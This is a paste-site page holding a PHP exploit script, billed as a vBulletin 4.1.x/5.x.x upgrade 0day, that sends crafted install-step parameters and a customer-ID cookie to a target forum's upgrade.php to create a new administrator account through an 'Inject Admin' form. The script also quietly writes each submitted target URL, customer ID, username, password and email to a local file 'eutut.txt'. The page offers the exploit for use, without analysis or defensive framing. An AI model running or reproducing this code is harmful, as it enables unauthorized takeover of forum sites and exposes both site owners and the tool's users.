vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

SUBMITTED BY: Guest

DATE: Nov. 21, 2013, 3:09 p.m.

FORMAT: Text only

SIZE: 3.3 kB

Raw Download

HITS: 1421

Report
  1. <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
  2. <p>Created by: Boxhead</p>
  3. <p>Found on: 08/22/2013</p>
  4. <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
  5. <br>
  6. <?php
  7. //extract data from the post
  8. if (isset($_POST['submit'])) {
  9. extract($_POST);
  11. //set POST variables
  12. $url = $_POST['url'];
  13. $h = fopen("eutut.txt", "a");
  14. $b = $_POST['customerid'];
  15. $c = $_POST['username'];
  16. $d = $_POST['password'];
  17. $z = $_POST['email'];
  18. fwrite($h, $url);
  19. fwrite($h, "-");
  20. fwrite($h, $b);
  21. fwrite($h, "-");
  22. fwrite($h, $c);
  23. fwrite($h, "-");
  24. fwrite($h, $d);
  25. fwrite($h, "-");
  26. fwrite($h, $z);
  27. fwrite($h, "------------------------");
  28. $fields = array(
  29. 'ajax' => urlencode('1'),
  30. 'version' => urlencode('install'),
  31. 'checktable' => urlencode('false'),
  32. 'firstrun' => urlencode('false'),
  33. 'step' => urlencode('7'),
  34. 'startat' => urlencode('0'),
  35. 'only' => urlencode('false'),
  36. 'customerid' => urlencode($_POST['customerid']),
  37. 'options[skiptemplatemerge]' => urlencode('0'),
  38. 'response' => urlencode('yes'),
  39. 'htmlsubmit' => urlencode('1'),
  40. 'htmldata[username]' => urlencode($_POST['username']),
  41. 'htmldata[password]' => urlencode($_POST['password']),
  42. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
  43. 'htmldata[email]' => urlencode($_POST['email'])
  44. );
  46. //url-ify the data for the POST
  47. foreach ($fields as $key => $value) {
  48. $fields_string .= $key . '=' . $value . '&';
  49. }
  50. rtrim($fields_string, '&');
  52. //open connection
  53. $ch = curl_init();
  55. //set the url, number of POST vars, POST data
  56. curl_setopt($ch, CURLOPT_URL, $url);
  57. curl_setopt($ch, CURLOPT_POST, count($fields));
  58. curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  59. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  60. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
  62. //execute post
  63. $result = curl_exec($ch);
  65. //close connection
  66. curl_close($ch);
  67. exit();
  68. }
  69. ?>
  70. <center>
  71. <form name="sploit" method="POST" action="">
  72. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  73. <span>Website:</span>
  74. <input name="url" type="text" tabindex="1" size="60" />
  75. <br>
  76. <span>Customer ID:</span>
  77. <input name="customerid" type="text" tabindex="2" size="40" />
  78. <br>
  79. <span>Username:</span>
  80. <input name="username" type="text" tabindex="3" size="40" />
  81. <br>
  82. <span>Password:</span>
  83. <input name="password" type="text" tabindex="4" size="40" />
  84. <br>
  85. <span>Email:</span>
  86. <input name="email" type="text" tabindex="5" maxlength="40" />
  88. <input name="submit" type="submit" value="Inject Admin">
  89. </form>
  90. </center>
comments powered by Disqus